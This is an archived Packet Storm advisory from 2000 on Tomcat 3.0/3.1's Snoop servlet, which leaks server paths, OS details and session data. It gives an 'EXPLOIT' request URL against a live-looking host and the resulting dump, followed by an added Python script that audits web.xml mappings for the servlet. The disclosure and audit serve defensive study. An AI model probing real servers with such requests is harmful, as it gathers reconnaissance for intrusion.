snoop.servlet.txt

20 Jul 2000 | Reported by Efrain Torres | Type: packetstorm | Source: packetstormsecurity.com

Snoop Servlet on Tomcat reveals sensitive information, posing security risks to users.

`[LoWNOISE] Snoop Servlet (Tomcat 3.1 and 3.0)  
  
  
====PRODUCT:  
Snoop Servlet on Release Build 3.1 and 3.0 of Tomcat from   
Apache Software Foundation.  
  
http://jakarta.apache.org  
  
  
  
====PROBLEM:   
The Snoop Servlet will give you too much info (PATHs, OS, etc.)  
  
====EXPLOIT:  
http://narco.guerrilla.sucks.co:8080/examples/jsp/snp/anything.snp  
  
  
====  
Snoop Servlet  
  
Servlet init parameters:  
  
Context init parameters:  
  
Context attributes:  
javax.servlet.context.tempdir =  
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples  
sun.servlet.workdir =  
/appsrv2/jakarta-tomcat/work/localhost_8080%2Fexamples  
  
Request attributes:  
  
Servlet Name: snoop  
Protocol: HTTP/1.0  
Scheme: http  
Server Name: narco.goverment.sucks.co  
Server Port: 8080   
Server Info: Tomcat Web Server/3.1 (JSP 1.1; Servlet 2.2; Java 1.1.8; AIX  
4.2 POWER_RS; java.vendor=IBM Corporation)  
Remote Addr: xxx.xxx.xxx.xxx  
Remote Host: xxx.xxx.xxx.xxx  
Character Encoding: null  
Content Length: -1  
Content Type: null  
Locale: en  
Default Response Buffer: 8192  
  
Parameter names in this request:  
  
Headers in this request:  
Host: narco.goverment.sucks.co:8080  
Accept-Encoding: gzip  
Cookie: JSESSIONID=To1212mC7833304641226407At  
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,  
*/*  
Connection: Keep-Alive  
Accept-Charset: iso-8859-1,*,utf-8  
User-Agent: Mozilla/4.51 [en] (Winsucks; I)  
Accept-Language: en  
  
Cookies in this request:  
JSESSIONID = To1212mC7833304641226407At  
  
Request Is Secure: false  
Auth Type: null  
HTTP Method: GET  
Remote User: null  
Request URI: /examples/jsp/snp/anything.snp  
Context Path: /examples  
Servlet Path: /jsp/snp/anything.snp  
Path Info: null  
Path Trans: null  
Query String: null  
  
Requested Session Id: To1212mC7833304641226407At  
Current Session Id: To1212mC7833304641226407At  
Session Created Time: 964047263477  
Session Last Accessed Time: 964047528749  
Session Max Inactive Interval Seconds: 1800  
  
Session values:   
numguess = num.NumberGuessBean@6bfa9a1  
====  
Efrain 'ET' Torres  
[email protected]  
  
[LoWNOISE] Colombia 2000  
  
  
  
`
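The dump above reports Servlet Path `/jsp/snp/anything.snp` with a null Path Info, which is what a Servlet-spec extension mapping produces. As an added example (not part of the original advisory and not Tomcat's own code), the Python script below applies Servlet-spec URL matching to a deployment descriptor to list which patterns expose a servlet named `snoop`; the `web.xml` content is a constructed sample, the function names are hypothetical, and a descriptor without XML namespaces is assumed.

```python
import xml.etree.ElementTree as ET

# Constructed sample descriptor (not taken from the page): an examples webapp
# that maps a servlet named "snoop" to a fixed path and to an extension.
SAMPLE_WEB_XML = """<web-app>
  <servlet><servlet-name>snoop</servlet-name>
           <servlet-class>SnoopServlet</servlet-class></servlet>
  <servlet-mapping><servlet-name>snoop</servlet-name>
                   <url-pattern>/snoop</url-pattern></servlet-mapping>
  <servlet-mapping><servlet-name>snoop</servlet-name>
                   <url-pattern>*.snp</url-pattern></servlet-mapping>
</web-app>"""

def load_mappings(web_xml):
    """Return [(url_pattern, servlet_name)] from a web.xml string."""
    root = ET.fromstring(web_xml)
    return [(m.findtext("url-pattern").strip(),
             m.findtext("servlet-name").strip())
            for m in root.iter("servlet-mapping")]

def resolve(path, mappings):
    """Match a context-relative path: exact, longest prefix, then extension."""
    for pat, name in mappings:
        if pat == path:
            return name, pat
    prefixes = [(p, n) for p, n in mappings if p.endswith("/*")
                and (path == p[:-2] or path.startswith(p[:-1]))]
    if prefixes:
        pat, name = max(prefixes, key=lambda x: len(x[0]))
        return name, pat
    last = path.rsplit("/", 1)[-1]
    if "." in last:
        ext = "*." + last.rsplit(".", 1)[1]
        for pat, name in mappings:
            if pat == ext:
                return name, pat
    return None, None

def audit(web_xml, servlet="snoop"):
    """List every URL pattern that exposes the named servlet."""
    return [p for p, n in load_mappings(web_xml) if n == servlet]

if __name__ == "__main__":
    maps = load_mappings(SAMPLE_WEB_XML)
    # The context-relative path from the advisory's request.
    print(resolve("/jsp/snp/anything.snp", maps))
    print(audit(SAMPLE_WEB_XML))
```

Any pattern returned by `audit` is a mapping to remove or restrict before the webapp is deployed on a reachable host.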

Vulners AI Score: 7.4 (High risk)